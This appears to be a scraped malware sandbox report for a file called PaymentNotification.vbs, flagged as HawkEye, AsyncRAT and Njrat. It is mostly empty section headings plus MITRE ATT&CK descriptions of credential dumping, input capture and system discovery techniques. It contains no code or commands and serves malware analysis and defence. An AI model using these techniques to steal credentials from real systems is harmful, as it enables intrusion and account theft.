Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report PaymentNotification.vbs

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: HawkEye

Threatname: AsyncRAT

Threatname: Njrat

Yara Overview

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	File monitoring, Process command-line parameters
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre